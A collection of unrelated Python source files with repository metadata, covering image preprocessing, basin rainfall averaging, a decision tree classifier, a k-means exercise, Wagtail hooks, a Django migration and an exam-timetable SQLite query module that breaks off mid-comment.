marcellacornia/mlnet | 9,079,560,877,836 | 4041d0163c8a23d82e43b6dbce126fe370b3b87b | 7f8a7db3c33973e91688357663cd92f280e639fe | /utilities.py | c339528cdde192f03aca786124eef39846e849c3 | [
"MIT"
] | permissive | https://github.com/marcellacornia/mlnet | f3ff5647983ef584bd684b612a1b1db8a6541103 | bf6e4a9905915a2bddad2cbe45ac35524fd788c5 | refs/heads/master | 2021-11-20T11:34:01.721948 | 2021-10-26T14:05:12 | 2021-10-26T14:05:12 | 67,144,952 | 104 | 41 | null | null | null | null | null | null | null | null | null | null | null | null | null | from __future__ import division
import cv2
import numpy as np
def padding(img, shape_r=480, shape_c=640, channels=3):
img_padded = np.zeros((shape_r, shape_c, channels), dtype=np.uint8)
if channels == 1:
img_padded = np.zeros((shape_r, shape_c), dtype=np.uint8)
original_shape = img.shape
rows_rate = original_shape[0]/shape_r
cols_rate = original_shape[1]/shape_c
if rows_rate > cols_rate:
new_cols = (original_shape[1] * shape_r) // original_shape[0]
img = cv2.resize(img, (new_cols, shape_r))
if new_cols > shape_c:
new_cols = shape_c
img_padded[:, ((img_padded.shape[1] - new_cols) // 2):((img_padded.shape[1] - new_cols) // 2 + new_cols)] = img
else:
new_rows = (original_shape[0] * shape_c) // original_shape[1]
img = cv2.resize(img, (shape_c, new_rows))
if new_rows > shape_r:
new_rows = shape_r
img_padded[((img_padded.shape[0] - new_rows) // 2):((img_padded.shape[0] - new_rows) // 2 + new_rows), :] = img
return img_padded
def preprocess_images(paths, shape_r, shape_c):
ims = np.zeros((len(paths), shape_r, shape_c, 3))
for i, path in enumerate(paths):
original_image = cv2.imread(path)
padded_image = padding(original_image, shape_r, shape_c, 3)
ims[i] = padded_image
ims[:, :, :, 0] -= 103.939
ims[:, :, :, 1] -= 116.779
ims[:, :, :, 2] -= 123.68
ims = ims.transpose((0, 3, 1, 2))
return ims
def preprocess_maps(paths, shape_r, shape_c):
ims = np.zeros((len(paths), 1, shape_r, shape_c))
for i, path in enumerate(paths):
original_map = cv2.imread(path, 0)
padded_map = padding(original_map, shape_r, shape_c, 1)
ims[i, 0] = padded_map.astype(np.float32)
ims[i, 0] /= 255.0
return ims
def postprocess_predictions(pred, shape_r, shape_c):
predictions_shape = pred.shape
rows_rate = shape_r / predictions_shape[0]
cols_rate = shape_c / predictions_shape[1]
if rows_rate > cols_rate:
new_cols = (predictions_shape[1] * shape_r) // predictions_shape[0]
pred = cv2.resize(pred, (new_cols, shape_r))
img = pred[:, ((pred.shape[1] - shape_c) // 2):((pred.shape[1] - shape_c) // 2 + shape_c)]
else:
new_rows = (predictions_shape[0] * shape_c) // predictions_shape[1]
pred = cv2.resize(pred, (shape_c, new_rows))
img = pred[((pred.shape[0] - shape_r) // 2):((pred.shape[0] - shape_r) // 2 + shape_r), :]
return img / np.max(img) * 255 | UTF-8 | Python | false | false | 2,623 | py | 4 | utilities.py | 3 | 0.563096 | 0.53069 | 0 | 73 | 33.958904 | 119 |
YX577/aqualord | 12,524,124,639,742 | 68250f59ba97619bc62c9fd9ffdd46fbd6e5b403 | fe9ea4a12c38998c93e9caced4b745d3bc0a7977 | /rdr6min/basin_precipitation.py | 7974eddcde03ff013cd173f96ce59c2123dd6418 | [] | no_license | https://github.com/YX577/aqualord | d07d710ed3221d55c086eb9d669b7bdc9b247e71 | bc837db55f156b7cb85f83ff253905ec9c5cdeaf | refs/heads/master | 2022-11-26T10:15:23.002380 | 2020-07-29T12:53:06 | 2020-07-29T12:53:06 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''流域内的雷达测雨数据和雨量站数据的融合'''
import project_util
from geojson_utils import point_in_multipolygon, json
import numpy as np
import conditional_merge
def calculate_average_precipitation(geojson_file, precipitation_data, x_start_index, y_start_index, x_end_index,
y_end_index):
"""根据给定的各个像素的降雨数据计算面平均降雨"""
average_precipitation = 0
points = points_of_radar_map_in_basin(geojson_file)
gridx = np.arange(x_start_index, x_end_index, 1.0)
gridy = np.arange(y_start_index, y_end_index, 1.0)
for i in gridx:
for j in gridy:
if [i, j] in points:
average_precipitation = average_precipitation + precipitation_data[i - x_start_index, j - y_start_index]
average_precipitation = average_precipitation / (len(gridx) * len(gridy))
return average_precipitation
def points_of_radar_map_in_basin(geojson_file):
"""判断雷达图内哪些点在流域内,返回在流域内的像素格点的x_in_graph和y_in_graph"""
sql = "select * from t_be_radar_grid"
url, username, password, database = project_util.time_sequence_table()
radar_grids = project_util.mysql_sql(url, username, password, database, sql)
print(radar_grids)
radar_grid_in_basin = []
json_file = open(geojson_file, encoding='utf-8')
geojson_setting = json.load(json_file)
multipoly = geojson_setting['features'][1]['geometry']
print(geojson_setting)
for i in range(0, len(radar_grids)):
center_longitude = radar_grids.loc[i, 'center_longitude']
center_latitude = radar_grids.loc[i, 'center_latitude']
if is_point_in_boundary(center_longitude, center_latitude, multipoly):
radar_grid_in_basin.append([radar_grids.loc[i, 'x_in_graph'], radar_grids.loc[i, 'y_in_graph']])
print(radar_grid_in_basin)
project_util.write_2d_array_to_txt(radar_grid_in_basin, 'radar_grid_in_basin.txt')
return radar_grid_in_basin
def is_point_in_boundary(px, py, multipoly):
"""给定一个点的经纬度坐标,判断是否在多多边形边界内"""
# json_file = open(geojson_file, encoding='utf-8')
# geojson_setting = json.load(json_file)
point_str = '{"type": "Point", "coordinates": [' + str(px) + ', ' + str(py) + ']}'
print(point_str)
# multipoly_str = '{"type":"MultiPolygon","coordinates":[[[[0,0],[0,10],[10,10],[10,0],[0,0]]],[[[10,10],[10,20],[20,20],[20,10],[10,10]]]]}'
# multipoly = geojson_setting['features'][1]['geometry']
point = json.loads(point_str)
return point_in_multipolygon(point, multipoly)
# True
if __name__ == "__main__":
start_time = '2016-08-30 00:00:00'
end_time = '2016-09-09 00:00:00'
merge_data, x_start_index, y_start_index, x_end_index, y_end_index = conditional_merge.radar_rain_gauge_merge(
start_time, end_time)
geojson_file = "tests/huanren_boundary_gc.json"
average_rain = calculate_average_precipitation(geojson_file, merge_data, x_start_index, y_start_index, x_end_index,
y_end_index)
print(average_rain)
| UTF-8 | Python | false | false | 3,180 | py | 28 | basin_precipitation.py | 11 | 0.646097 | 0.621748 | 0 | 66 | 44.424242 | 145 |
snake1597/Scikit_learn | 7,945,689,504,977 | f251de253e6be677fd998ffd6d28315a55458069 | 0c19b05ca828c18cafed11456d4755e7733ba75a | /DecisionTree.py | 6294f8c34d3c31c2077b1471c11b0fa750faf1f8 | [] | no_license | https://github.com/snake1597/Scikit_learn | c14e4b0335bb3654ce474e430f18865289ad1d1f | 5e876146f4f53fe07dbf0847b23e4baadb488894 | refs/heads/master | 2020-07-10T19:56:00.179110 | 2019-08-26T00:46:00 | 2019-08-26T00:46:00 | 204,355,369 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sklearn import datasets, tree, metrics
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import confusion_matrix
from sklearn.cross_validation import cross_val_score
wine = datasets.load_wine()
x_data = wine.data
y_data = wine.target
x_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size = 0.3)
sc = StandardScaler()
sc.fit(x_train)
x_train = sc.transform(x_train)
x_test = sc.transform(x_test)
clf = tree.DecisionTreeClassifier()
iris_clf = clf.fit(x_train, y_train)
prediction = iris_clf.predict(x_test)
accuracy = metrics.accuracy_score(y_test, prediction)
cnf=confusion_matrix(y_test,prediction)
print('accuracy: ',accuracy)
print('prediction:')
print(prediction)
print('y_test_label:')
print(y_test)
print('confusion matrix:')
print(cnf)
scores = cross_val_score(clf, x_data, y_data, cv=10, scoring='accuracy')
print('10-Fold cross validation mean:',scores.mean())
| UTF-8 | Python | false | false | 1,009 | py | 2 | DecisionTree.py | 2 | 0.732408 | 0.726462 | 0 | 31 | 30.548387 | 84 |
luisnarvaez19/Proyectos_Python | 3,367,254,367,249 | 275ec4089b0e1ec38910c3841f500897a9071bf7 | 560fc121079581f0568d6aa59a14053015da08be | /edu/cursoLN/practica1/creciente.py | b6f5c782db7b7059c9f5320182619e430471f4b3 | [] | no_license | https://github.com/luisnarvaez19/Proyectos_Python | 1f5c31d3592ec5fb2594d1f4b0163338d5751951 | 45dc51ce9d93f0b7e96eff9ca7100bd4b69e172e | refs/heads/master | 2021-06-21T13:02:22.901541 | 2021-03-17T23:57:58 | 2021-03-17T23:57:58 | 199,532,892 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
9. Escribir un programa en Python que detecte si se han introducido en orden creciente
tres números introducidos por el usuario.
'''
x = 5
y = 9
z = 2
if x > y and y > z:
print('Si se han introducido en orden creciente')
else:
print('No se han introducido en orden creciente')
'''
9. Escribir un programa en Python que ordene
dos números introducidos por el usuario.
'''
x = 85
y = 59
temp = 0
if x > y:
temp = y
y = x # ahora y = 85
x = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y} ')
'''
9. Escribir un programa en Python que ordene
tres números introducidos por el usuario.
'''
x = 5
y = 9
z = 2
print(f'Ordenados en forma creciente, x es: {x}, y es: {y} y z es: {z}')
x = 85
y = 59
temp = 0
# y = luis x = pablo temp = silla intermedia temporal
if x > y : # perfecto
temp = x
x = y
y = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
x = 85
y = 59
temp = 0
if x > y :
temp = y
y = x
x = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
x = 85
y = 59
anterior = 0
if x > y :
anterior = x
x = y
y = anterior
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
x = 85
y = 59
temp = 0
if x > y:
temp = x
x = y
y = temp
print(f'Ordenados en forma creciente, x es: {x}, y es: {y}' )
| UTF-8 | Python | false | false | 1,406 | py | 2,230 | creciente.py | 159 | 0.563079 | 0.53742 | 0 | 101 | 12.831683 | 90 |
eea/eea.docker.flis | 1,348,619,775,629 | 45c429131fdc2cd6b40891029fbb7d4578f515f7 | c8687527a70d7e11610560adb8e86dd69585b4aa | /code/pages/wagtail_hooks.py | cf7154af788d95d33f5ee27b1384fbfeeafef5fa | [
"BSD-3-Clause"
] | permissive | https://github.com/eea/eea.docker.flis | 0d69964687eca81a9d43aff3bdd3a8598a9d22f7 | 9bc78d9bf3436e9539f15a6a0ba9c2fd7a030907 | refs/heads/master | 2023-08-01T05:36:40.303785 | 2017-07-06T17:08:36 | 2017-07-06T17:08:36 | 94,788,064 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf import settings
from django.utils.html import format_html_join, format_html
from wagtail.wagtailcore import hooks
from .admin import *
@hooks.register('insert_editor_js')
def editor_js():
js_files = [
'pages/js/tweak_richtext_buttons.js',
]
js_includes = format_html_join('\n', '<script src="{0}{1}"></script>',
((settings.STATIC_URL, filename) for filename in js_files)
)
return js_includes
@hooks.register('construct_main_menu')
def hide_snippets_menu_item(request, menu_items):
menu_items[:] = [item for item in menu_items if item.name != 'snippets']
@hooks.register('insert_global_admin_css')
def global_admin_css():
from django.contrib.staticfiles.templatetags.staticfiles import static
return format_html('<link rel="stylesheet" href="{}">', static('pages/css/wagtailadmin-style.css'))
| UTF-8 | Python | false | false | 921 | py | 142 | wagtail_hooks.py | 68 | 0.655809 | 0.653637 | 0 | 26 | 34.423077 | 103 |
malk321/master-python | 18,313,740,567,271 | 85c579ed54a07e7d1734062ded504938926689ab | 53b6447da398945a7f9e918f6de3cf6b711a8b9a | /INF413/tp2/tp2.py | 54c3b0041d0eaa976900eb77a3bbd068892f6de1 | [] | no_license | https://github.com/malk321/master-python | 0642636e850f2f1f58fb98f3d976d4313fe5a43c | 42f13603eaa48213de3e47951d394199ad10ebcf | refs/heads/master | 2020-04-16T23:02:27.668865 | 2017-02-26T21:57:17 | 2017-02-26T21:57:17 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding : utf-8 -*-
import math, random, sys
# Authors: Benoit PORTEBOEUF, Morgan ROBIN
# Date: 10.09.2015
# Course: MAJ INF-413
########################################
## ##
## K-MEANS ALGORITHM IMPLEMENTATION ##
## ##
########################################
"""
This software implements a k-means algorithm. Data must be written in a file named 'data.txt' as follow: coord1, coord2, ..., coordn, string\ncoord1', ...
It will be possible to choose between different types of norm calculation - Euclidean and Manhattan are currently available.
There is two classes: point and group. A point is defined by its name (id), its coordinates and a string (for instance, its specie). A group is defined by a name (id), a center (point), and points.
"""
###################################
# CLASS DEFINITIONS
###################################
class point : # Name is the id (int) of the point, coordinate is a list of its coordinates and specie is a string that qualifies it
def __init__(self,name,coordinates,specie) :
self.name = name
self.coordinates = coordinates
self.specie = specie
return
def __str__(self) :
return str(self.name) + str(self.coordinates) + str(self.specie)
def __eq__(self, name) :
if self.name == name :
return True
else :
return False
class group : # A group is a set of points. Name is the id (int) of the group, center is the closest point to its isobarycenter and points is a list f its points.
def __init__(self,name) :
self.name = name
self.center = None
self.points = list()
return
def center(self, center) :
self.center = center
return
def add(self,point) :
self.points.append(point)
return
def remove(self,point) :
self.points.remove(point)
return
def __str__(self) :
s = str()
for point in self.points :
s += " "+str(point)
return "group " + str(self.name) + " - " + "center: " + str(self.center) +" - points: " + s
######################################
# DISTANCE CALCULATION
######################################
def Distance(center,point,norm) : # Returns the distance between the center and the point according to the chosen norm
if norm == "Euclidean" :
return Euclidean(center, point)
elif norm == "Manhattan" :
return Manhattan(center, point)
else : #norm == "Sup"
return Sup(center, point)
def Euclidean(center, point): # Euclidean norm (norm 2)
# center is a point type and is the reference, point is a point type
tmp = 0
l = len(center.coordinates)
for i in range(0,l) :
tmp+=(float(center.coordinates[i])-float(point.coordinates[i]))**2
return math.sqrt(float(tmp))
def Manhattan(center, point) : # Manhattan norm (norm 1)
tmp = 0
l = len(center.coordinates)
for i in range(0,l) :
tmp += abs(float(center.coordinates[i])-float(point.coordinates[i]))
return tmp
def Sup(center, point) : # Superior norm (norm infinite)
tmp = 0
l = len(center.coordinates)
for i in range(0,l) :
a = abs(float(center.coordinates[i])-float(point.coordinates[i]))
if a >= tmp :
tmp = a
return tmp
#####################################
# INITIALIZATION
#####################################
def choose(k,data) : # Chooses k random centers in all the points
centers = list()
i = 0
while i < k :
tmp = random.randrange(len(data))
if tmp not in centers :
centers.append(tmp)
i+=1
return centers
def make_group(centers,data) : # Builds the initial groups with their centers only
groups = dict()
i = 0
for elt in centers :
Group = group(str(i))
Group.center = data[elt]
groups[i] = Group
i+=1
return groups
######################################
# LOOP INSTRUCTIONS
######################################
def optimizing(groups,data,norm) : # Calculates the distance of every point to every centers and optimizes groups
for point in data : # Calculates the distances
dist = list()
for group in groups :
dist.append(Distance(groups[group].center,data[point],norm))
i = 0
mini = dist[0]
for elt in dist : # Finds the closest center and group
if elt <= mini :
mini = elt
gr = i
i+=1
#print(dist,mini,gr,point)
if point not in groups[gr].points : # Changes group if needed
groups[gr].add(data[point])
print("point "+str(point)+" added to group "+str(gr))
for group in groups : # Removes the point from its previous group if needed
if groups[group].name != groups[gr].name and data[point] in groups[group].points and groups[group].center != data[point] :
groups[group].remove(data[point])
print("point "+str(point)+" removed from group "+str(group))
return groups
def new_centers(groups,centers,norm) : # Calculates the centers of the different groups
centers2 = list()
for group in groups : # Calculates the isobarycenter of every group
bary = [0]
gr = groups[group]
for Point in gr.points :
i = 0
p = Point
for coordinate in p.coordinates :
if len(bary)-1 < i :
bary.append(float(coordinate))
else :
bary[i] += float(coordinate)
i+=1
coordinates = list()
for coordinate in bary :
if len(gr.points)!=0 :
coordinates.append(float(coordinate)/float(len(gr.points)))
barycenter = point("bary"+str(group),coordinates," ")
for Point in gr.points : # Finds the closest point to the calculated isobarycenter
dist = list()
dist.append(Distance(barycenter,Point,norm))
dmin = dist[0]
b = 0
for i in range(len(dist)) :
if dist[i] < dmin :
dmin = dist[i]
b = i
centers2.append(gr.points[b].name) # Updates the center
gr.center = gr.points[b]
return groups,centers2
######################################
# TESTS
######################################
def verify_specie(groups) : # Verifies that every points in the same group have the same specie
for group in groups :
ref = groups[group].points[0].specie
for point in groups[group].points :
if point.specie != ref :
return False
return True
def verify_norms() : # Verifies that norms behave in a coherent way
a = point('a',[0,1,2],' ')
b = point('b',[1,0,2],' ')
c = point('c',[2,1,0],' ')
O = point('0',[0,0,0],' ')
if Distance(a,a,'Euclidean') == 0 and Distance(a,a,'Sup') == 0 and Distance(a,a,'Manhattan') == 0 : # Separation
if int(Distance(a,b,'Euclidean')**2) == 2 and int(Distance(a,b,'Sup')) == 1 and int(Distance(a,b,'Manhattan')) == 2 : # Result
if Distance(a,O,'Euclidean') > 0 and Distance(a,O,'Sup') > 0 and Distance(a,O,'Manhattan') > 0 : # Positivity
if Distance(a,c,'Euclidean') <= Distance(a,b,'Euclidean') + Distance(b,c,'Euclidean') and Distance(a,c,'Sup') <= Distance(a,b,'Sup') + Distance(b,c,'Sup') and Distance(a,c,'Manhattan') <= Distance(a,b,'Manhattan') + Distance(b,c,'Manhattan') : # Triangular inequality
return True
else :
return False
else :
return False
else :
return False
else :
return False
######################################
# MAIN
######################################
def input_(string) : # Allows compatibility with Python 2 for input
if sys.version_info[0] < 3 :
return raw_input(string)
else :
return input(string)
def main(k,norm) :
print("Starting programm...")
print("Loading data...")
dat = open('data.txt','r')
data2 = dat.read().split("\n")
dat.close()
data = dict() # Every point is loaded into a dictionary
i = 0
for elt in data2 :
if len(elt) != 0 :
elt = elt.split(",")
l = len(elt)-1
data[len(data)] = point(i,elt[:l],elt[l])
i+=1
if k == "NULL" :
maxi = len(data)
k = 0
while k == 0 :
k = int(input_("Enter a number of group\n"))
if k<1 and k>maxi:
k=0
print("Choosing "+str(k)+" centers...") # k centers are randomly chosen among the points
centers = choose(k,data)
print("Creating groups...") # And k empty groups are created according to the k chosen centers
groups = make_group(centers, data)
while norm == 'NULL' :
norm = input_("Choose your norm for distance calculation: Euclidean, Manhattan or Sup\n")
if norm != "Euclidean" and norm != "Manhattan" and norm != "Sup":
norm = 'NULL'
print(norm)
print("Optimizing groups...")
stable = False
prestable = False
while not stable : # As long as the centers are not stable, we optimize the groups (centers and associated points)
centers_old = list(centers)
groups = optimizing(groups,data,norm)
groups,centers = new_centers(groups,centers,norm)
for i in range(k) :
stable = True
if centers[i] != centers_old[i] :
stable = False
#print(centers,centers_old,stable)
print("Groups optimized.")
print("Verifying norms...")
if verify_norms() :
print("Norms successfully verified")
else :
print("An error has occured: norms do not behave correctly")
print("Verifying results...")
if verify_specie(groups) :
print("Results successfully verified: all points in a group are of the same kind.")
else :
print("An error has been found: all points in a group are not of the same kind.")
for group in groups :
print("\n"+str(groups[group])+"\n")
print("Done")
return centers
main('NULL','NULL')
| UTF-8 | Python | false | false | 9,111 | py | 72 | tp2.py | 52 | 0.619471 | 0.61091 | 0 | 321 | 27.380062 | 271 |
Arthur264/rest_blog | 15,307,263,455,143 | d0f5a53bee85b67105e7e4777835b62c1c7e2613 | 93a07a2b9910ec54c99404b34f2ca16086c50f85 | /posts/migrations/0002_auto_20180430_1601.py | f6f69d9af74806a5b4ebc19e049a5f71e66d55b4 | [] | no_license | https://github.com/Arthur264/rest_blog | 426e810ba4668f367f5dcde9ac328b98edd4b66d | cb1782208cf6c071fc54447aa5f849d20951b1ba | refs/heads/master | 2023-01-06T05:24:49.102544 | 2018-05-02T12:38:01 | 2018-05-02T12:38:01 | 126,502,369 | 0 | 1 | null | false | 2022-12-26T20:15:15 | 2018-03-23T15:12:55 | 2018-05-02T12:38:18 | 2022-12-26T20:15:13 | 1,245 | 0 | 1 | 11 | Python | false | false | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-30 16:01
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='category',
old_name='create',
new_name='create_at',
),
migrations.RenameField(
model_name='category',
old_name='update',
new_name='update_at',
),
migrations.RenameField(
model_name='post',
old_name='create',
new_name='create_at',
),
migrations.RenameField(
model_name='post',
old_name='update',
new_name='update_at',
),
migrations.RenameField(
model_name='postvisited',
old_name='create',
new_name='create_at',
),
migrations.RenameField(
model_name='postvisited',
old_name='update',
new_name='update_at',
),
]
| UTF-8 | Python | false | false | 1,134 | py | 45 | 0002_auto_20180430_1601.py | 42 | 0.502646 | 0.483245 | 0 | 45 | 24.2 | 49 |
nonsoo/ExamTimetable | 13,709,535,644,111 | dce8121f9cf622099537b878c74871981cfa5294 | 941918352a200b12cbfa6fe6102d9070701a1c27 | /Databases(Assignment 3)/queries.py | d13d9e897d4abf9c8cb6a3ef8945acf215d301ac | [] | no_license | https://github.com/nonsoo/ExamTimetable | 1eec6402467bffe1e5141e745f0dd3be47833770 | 6ed26198afbdb38c2b445fbfa29042a16c1a667c | refs/heads/main | 2023-02-19T01:57:32.926457 | 2021-01-23T14:54:40 | 2021-01-23T14:54:40 | 332,234,972 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sqlite3
from make_tables import check_courses
def run_query(db, query, args=None):
"""(str, str, tuple) -> list of tuple
Return the results of running query q with arguments args on
database db."""
conn = sqlite3.connect(db)
cur = conn.cursor()
# execute the query with the given args passed
# if args is None, we have only a query
if args is None:
cur.execute(query)
else:
cur.execute(query, args)
results = cur.fetchall()
cur.close()
conn.close()
return results
def get_course_instructors(db, course):
'''Return the Course number, sections and instructors for the given
course number.
>>> get_course_instructors('exams.db', 'BIOC12H3F')
[('BIOC12H3F', 'LEC01', 'R. Zhao')]
>>> get_course_instructors('exams.db', 'BIOC15H3F')
[('BIOC15H3F', 'LEC01', 'C. Hasenkampf')]
>>> get_course_instructors('exams.db', 'CSCA20H3F')
[('CSCA20H3F', 'ALL', 'A. Bretscher')]
'''
# From the given course code, its going to return the course code, section
# number and instructors for the course
query = '''SELECT Course, Section, Name FROM Courses
WHERE Course= ?'''
args = (course,)
return run_query(db, query, args)
def get_course_time(db, course):
'''Return the course number, ID, the date and start time of the given
course's exam for all sections. Note there are only multiple sections if
the course IDs are different.
>>> get_course_time('exams.db', 'BIOC12H3F')
[('BIOC12H3F', '32', '17-12-18', '14:00')]
>>> get_course_time('exams.db', 'BIOC15H3F')
[('BIOC15H3F', '33', '17-12-11', '9:00')]
>>> get_course_time('exams.db', 'BIOC32H3F')
[('BIOC32H3F', '35', '17-12-07', '19:00')]
'''
# From the given course, its going to return the course code, id, date
# and start time for the course
query = '''SELECT DISTINCT Courses.Course, Courses.ID, Time.Date,
Time.Start FROM Courses JOIN Time ON Courses.ID = Time.ID WHERE
Course = ? '''
args = (course,)
return run_query(db, query, args)
def get_course_time_section(db, course, section):
'''Return the course number, section, the date and start time of the
given course's exam.
>>> get_course_time_section('exams.db', 'BIOC12H3F', 'LEC01')
[('BIOC12H3F', 'LEC01', '17-12-18', '14:00')]
>>> get_course_time_section('exams.db', 'BIOC15H3F', 'LEC01')
[('BIOC15H3F', 'LEC01', '17-12-11', '9:00')]
>>> get_course_time_section('exams.db', 'BIOC32H3F', 'LEC01')
[('BIOC32H3F', 'LEC01', '17-12-07', '19:00')]
'''
# For the given course and section, the function is going to retrieve the
# courseSection date, course code, and start time
query = '''SELECT DISTINCT Courses.Course, Courses.Section, Time.Date,
Time.Start FROM Courses JOIN Time ON Courses.ID = Time.ID WHERE
Course = ? AND Section= ?'''
args = (course, section)
return run_query(db, query, args)
def courses_multi_instructors(db):
'''Return the course number and instructor names for courses with more
than one instructor. Note that this means the ID must be
the same for each instructor.
>>> courses_multi_instructors('exams.db')
[('BIOA01H3F', 'M. Fitzpatrick'), ('BIOA01H3F', 'A. Ashok'),\
('BIOA01H3F', 'S. Brunt'), ('CHMA10H3F', 'S. Ballantyne'),\
('CHMA10H3F', 'N. Thavarajah'), ('CHMB16H3F', 'R. Soong'),\
('CHMB16H3F', 'K. Kerman'), ('CSCA08H3F', 'M. Ahmadzadeh'),\
('CSCA08H3F', 'B. Harrington'), ('CSCA67H3F', 'R. Pancer'),\
('CSCA67H3F', 'A. Bretscher'), ('HLTC16H3F', 'C. Furness'),\
('HLTC16H3F', 'E. Seto'), ('MATA29H3F', 'G. Scott'),\
('MATA29H3F', 'X. Jiang'), ('MATA32H3F', 'E. Moore'),\
('MATA32H3F', 'R. Grinnell'), ('MATA32H3F', 'R. Buchweitz'),\
('MATA67H3F', 'R. Pancer'), ('MATA67H3F', 'A. Bretscher'),\
('MGAB01H3F', 'L. Chen'), ('MGAB01H3F', 'G. Quan Fun'),\
('MGAB01H3F', 'L. Harvey'), ('MGAB03H3F', 'L. Chen'),\
('MGAB03H3F', 'G. Quan Fun'), ('MGAD65H3F', 'P. Phung'),\
('MGAD65H3F', 'S. Ratnam'), ('POLB80H3F', 'S. Pratt'),\
('POLB80H3F', 'C. LaRoche'), ('STAB22H3F', 'M. Soltanifar'),\
('STAB22H3F', 'N. Asidianya'), ('VPMA93H3F', 'B. Kingsbury'),\
('VPMA93H3F', 'R. King')]
'''
# The function is going to return only the course and instructor names
# that have multiple instructors for one course
query = '''SELECT Course, Name FROM Courses WHERE ID IN
(SELECT ID FROM Courses GROUP BY ID having COUNT(*) > 1 )'''
return run_query(db, query)
def courses_how_many_instructors(db):
'''Return the course number and the number of instructors for courses with
more than one instructor. Note that this means the ID must be
the same for each instructor.
>>> courses_how_many_instructors('exams.db')
[('HLTC16H3F', 2), ('MATA29H3F', 2), ('MATA32H3F', 3), ('MATA67H3F', 2),\
('MGAB01H3F', 3), ('MGAB03H3F', 2), ('MGAD65H3F', 2), ('BIOA01H3F', 3),\
('POLB80H3F', 2), ('STAB22H3F', 2), ('VPMA93H3F', 2), ('CHMA10H3F', 2),\
('CHMB16H3F', 2), ('CSCA08H3F', 2), ('CSCA67H3F', 2)]
'''
# The function is going to return howmany instructors are assigned to each
# course for courses that have multiple instructors
query = '''SELECT DISTINCT Course, Count(ID) AS number_of_instructors
FROM Courses GROUP BY ID HAVING COUNT (ID) > 1'''
return run_query(db, query)
def find_dept_courses(db, dept):
'''Return the courses from the given department. Use the "LIKE"
clause in your SQL query for the course name.
>>> find_dept_courses('exams.db', 'BIOA')
[('BIOA01H3F',), ('BIOA11H3F',)]
>>> find_dept_courses('exams.db', 'ANTA')
[('ANTA01H3F',), ('ANTA02H3F',)]
>>> find_dept_courses('exams.db', 'CSCA')
[('CSCA08H3F',), ('CSCA20H3F',), ('CSCA67H3F',)]
'''
# The function is going to sort the courses based upon the courses that
# possess similar names
query = '''SELECT Distinct Course FROM Courses WHERE Course LIKE "'''\
+ str(dept) + '%"'
return run_query(db, query)
def get_locations(db, course):
'''Return the course, section and locations of the exam for the given
course.
>>> get_locations('exams.db', 'BIOC12H3F')
[('BIOC12H3F', 'LEC01', 'SW319'), ('BIOC12H3F', 'LEC01', 'SY110')]
>>> get_locations('exams.db', 'BIOC15H3F')
[('BIOC15H3F', 'LEC01', 'SY110')]
>>> get_locations('exams.db', 'BIOD23H3F')
[('BIOD23H3F', 'LEC01', 'MW140')]
'''
# The function is going to return the course, section and location of the
# exam for a given course
query = '''SELECT DISTINCT Courses.Course, Courses.Section, Location.Room
FROM Courses JOIN Location ON Courses.ID = Location.ID WHERE Course = ?'''
args = (course,)
return run_query(db, query, args)
def check_conflicts(db, course):
'''Return a list of course numbers of courses that have conflicts with
the given course. A conflict is the same date and same start time.
HINT: this may require more than one search.
>>> check_conflicts('exams.db', 'BIOD23H3F')
[('CSCD18H3F',), ('HLTB41H3F',), ('MGEA02H3F',),\
('MGEB11H3F',), ('MGEC40H3F',)]
>>> check_conflicts('exams.db', 'BIOA01H3F')
[('BIOB50H3F',), ('ENGB27H3F',), ('MGHB02H3F',), ('PHLB05H3F',)]
>>> check_conflicts('exams.db', 'MGEC40H3F')
[('BIOD23H3F',), ('CSCD18H3F',), ('HLTB41H3F',), ('MGEA02H3F',),\
('MGEB11H3F',)]
'''
query = '''SELECT DISTINCT Course FROM Courses JOIN Time ON
Courses.ID = Time.ID WHERE Time.Date = ? AND Time.Start = ?
AND Course != ?'''
# Finds the start time and date for the course entered then searches the
# database for other courses with the same start time and date
conflict = get_course_time(db, course)
args = (conflict[0][2], conflict[0][3], course)
return run_query(db, query, args)
if __name__ == '__main__':
# write your program here
# you may assume the database has been made and has the name
# DO NOT CHANGE THIS LINE
db = 'exams.db'
# add the rest of your code here
my_course_lst = []
valid_course = []
exam_schedule = {}
valid = check_courses(db)
# Stores all courses for the semester in the lst 'valid_course' to allow
# for validation later
for i in range(len(valid)):
valid_course.append(valid[i][1])
# Asks the user to enter as many courses as they desire, until the user
# returns nothing. Then converts all entered courses to uppercase to
# prevent the program from crashing. Program then checks if the entered
# course is a valid course. If the course entered is not a valid course,
# then display Not a valid course
quit = False
while quit is False:
entered_course = input('Please enter your course or return to quit: ')
# Checks if course entered is a valid course
if entered_course.upper() in valid_course:
my_course_lst.append(entered_course.upper())
elif entered_course == '':
quit = True
else:
print('Not a valid course code, please re-enter or return to \
quit. ')
# Retrieve Exam Times
# Goes through every course in course lst and checks if the course has
# multiple sections. If the course does not have multiple sections, then
# retrive the exam time for the course. If the course has multiple
# sections then retreive the exam time for the particular section of the
# course. Then store the information in a dictionary where the key is the
# specific course and the value is a list of tuple containing the exam
# course_code, time, date, section/ID
for course in my_course_lst:
check_section = get_course_instructors(db, course)
# CHECKS IF THE SECTION FOR THE PARTICULAR COURSE IS ALL
if check_section[0][1] == 'ALL':
exam_time = get_course_time(db, course)
else:
section = input('There are multiple sections of %s. What is your \
section?: ' % (course))
exam_time = get_course_time_section(db, course, section.upper())
# exam_schedule dict is dictionary containing course name as key and
# course info as the value
exam_schedule[course] = exam_time
# Goes through keys and values in exam_schedule and prints the course with
# time and date in accordance to the presence or absence of the section
# If the course has a specific section then display the exam time for the
# specific section of the course by checking if the first char for the
